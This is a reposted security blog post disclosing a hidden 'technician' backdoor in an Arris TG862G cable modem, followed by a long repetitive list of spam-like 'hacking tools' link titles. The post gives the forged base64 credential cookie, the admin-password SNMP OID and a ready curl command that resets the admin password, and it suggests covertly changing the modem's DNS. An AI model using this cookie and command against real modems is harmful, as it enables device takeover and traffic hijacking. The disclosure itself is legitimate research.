2020. augusztus 20., csütörtök

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Read more

  1. What Are Hacking Tools
  2. Hacking Tools Mac
  3. Hacker Tools Windows
  4. Hacking Apps
  5. Pentest Tools Subdomain
  6. Best Hacking Tools 2019
  7. Hack And Tools
  8. Hacking Tools Download
  9. Hack Website Online Tool
  10. Hacker Hardware Tools
  11. Hacking Tools And Software
  12. Pentest Reporting Tools
  13. Hack Tools
  14. Best Hacking Tools 2020
  15. Beginner Hacker Tools
  16. Pentest Tools Subdomain
  17. Hacking Tools Github
  18. Hacker Tools For Pc
  19. New Hack Tools
  20. Hacking Tools Hardware
  21. Pentest Box Tools Download
  22. Hack Tools Mac
  23. Hacking Tools For Windows
  24. Hacking Tools
  25. Nsa Hack Tools Download
  26. How To Install Pentest Tools In Ubuntu
  27. Pentest Tools Free
  28. Kik Hack Tools
  29. Hacker Tools Free Download
  30. Hacking Tools For Beginners
  31. Nsa Hack Tools Download
  32. Hack Tools
  33. Hacker Tools Online
  34. Hacking Tools For Mac
  35. Pentest Tools Nmap
  36. Hacker Tools For Pc
  37. Hacker Tools Free Download
  38. Hacker Tools Linux
  39. Github Hacking Tools
  40. Best Pentesting Tools 2018
  41. New Hack Tools
  42. Hacker Tools For Windows
  43. Hack Tools
  44. Hacker
  45. Hacker Techniques Tools And Incident Handling
  46. Hacker Techniques Tools And Incident Handling
  47. Hacker
  48. New Hack Tools
  49. Pentest Tools Free
  50. Beginner Hacker Tools
  51. Install Pentest Tools Ubuntu
  52. Hack Rom Tools
  53. Hacking Tools For Mac
  54. Pentest Tools Review
  55. Hacking Tools For Games
  56. Hack Apps
  57. Hack Tools
  58. Hacking Tools Free Download
  59. Pentest Tools Open Source
  60. Nsa Hack Tools Download
  61. Hack Rom Tools
  62. Hacker Tools 2020
  63. Pentest Tools Windows
  64. Hacker Tools Windows
  65. Hacking Tools Github
  66. Hacking Tools For Windows 7
  67. Pentest Tools Port Scanner
  68. New Hack Tools
  69. Hack Apps
  70. Pentest Tools Windows
  71. What Are Hacking Tools
  72. Hacker
  73. Hacker Tool Kit
  74. Hacking Tools And Software
  75. Ethical Hacker Tools
  76. Hacker Tools
  77. What Are Hacking Tools
  78. Ethical Hacker Tools
  79. Hacker Tools Hardware
  80. Tools 4 Hack
  81. Hacking Tools Software
  82. Best Hacking Tools 2020
  83. Game Hacking
  84. Physical Pentest Tools
  85. Hacking Tools Windows
  86. Hack Apps
  87. Hacks And Tools
  88. Hacking Tools And Software
  89. What Is Hacking Tools
  90. Hacking Tools Usb
  91. Hack Tool Apk
  92. Hacker Tools 2020
  93. Tools 4 Hack
  94. Hack And Tools
  95. Hack Rom Tools
  96. Hacker Tools Github
  97. What Are Hacking Tools
  98. Pentest Tools For Ubuntu
  99. Pentest Tools Kali Linux
  100. Hacking Tools 2019
  101. Pentest Tools Linux
  102. Pentest Tools Website Vulnerability
  103. Hacking Tools For Games
  104. Pentest Tools Linux
  105. Pentest Tools Online
  106. Hacking Tools For Games
  107. Pentest Tools Open Source
  108. Hacking Tools Online
  109. Hacker Tools Linux
  110. Bluetooth Hacking Tools Kali
  111. Top Pentest Tools
  112. Blackhat Hacker Tools
  113. Pentest Tools Website Vulnerability
  114. Pentest Tools Linux
  115. Pentest Tools Find Subdomains
  116. Pentest Tools Kali Linux
  117. Hacker Tool Kit
  118. Pentest Tools Website Vulnerability
  119. Hacking Tools Online
  120. Hacker Search Tools
  121. Pentest Tools Website Vulnerability
  122. How To Make Hacking Tools
  123. Hacker Tools Mac
  124. Hack Tools Download
  125. Hacking Tools For Pc
  126. Hacker
  127. Hacker Tool Kit
  128. Pentest Tools For Mac
  129. Hacking Tools Software
  130. Pentest Tools Framework
  131. Pentest Tools Open Source
  132. Pentest Reporting Tools
  133. Pentest Tools Website
  134. Underground Hacker Sites
  135. Hacking Tools For Pc
  136. Nsa Hack Tools Download
  137. Pentest Tools Review
  138. Pentest Tools For Mac
  139. Hacker Tools Free
  140. Hacking Tools For Mac
  141. Hacker Tools Hardware
  142. Nsa Hack Tools Download
  143. How To Make Hacking Tools
  144. Pentest Tools Framework
  145. How To Hack
  146. Termux Hacking Tools 2019
  147. Pentest Tools Alternative
  148. Hacker Tools For Windows
  149. Hacker Tools For Ios
  150. Hacker
  151. Termux Hacking Tools 2019